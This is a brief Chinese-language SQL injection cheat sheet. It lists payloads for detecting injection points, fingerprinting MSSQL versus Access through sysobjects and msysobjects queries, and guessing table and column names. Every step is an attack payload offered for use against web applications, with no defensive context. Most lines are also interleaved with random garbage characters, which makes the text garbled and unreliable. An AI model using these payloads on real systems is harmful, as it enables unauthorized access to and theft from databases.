1.判断是否有注入;and 1=1 ;and 1=2 kbMWGB%;
2.初步判断是否是mssql ;and user>0 g+>(dnX
qUGC"<W
3.注入参数是字符'and [查询条件] and ''=' qjdMqoOCjl
(VEpVn3{
4.搜索时没过滤参数的'and [查询条件] and '%25'=' eMY<uqdw
ZE=Sp=@)j
5.判断数据库系统 K<qk.~
S
+:!7L=N#
;and (select count(*) from sysobjects)>0 mssql q[W
0 N>
Q&=w_Wc
;and (select count(*) from msysobjects)>0 access 4V i`* !
1A G<$d5U|
$ig0j`
DiwxXqY
6.猜数据库 ;and (select Count(*) from [数据库名])>0 T)TfB(
6BbGA*%{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 VZymM<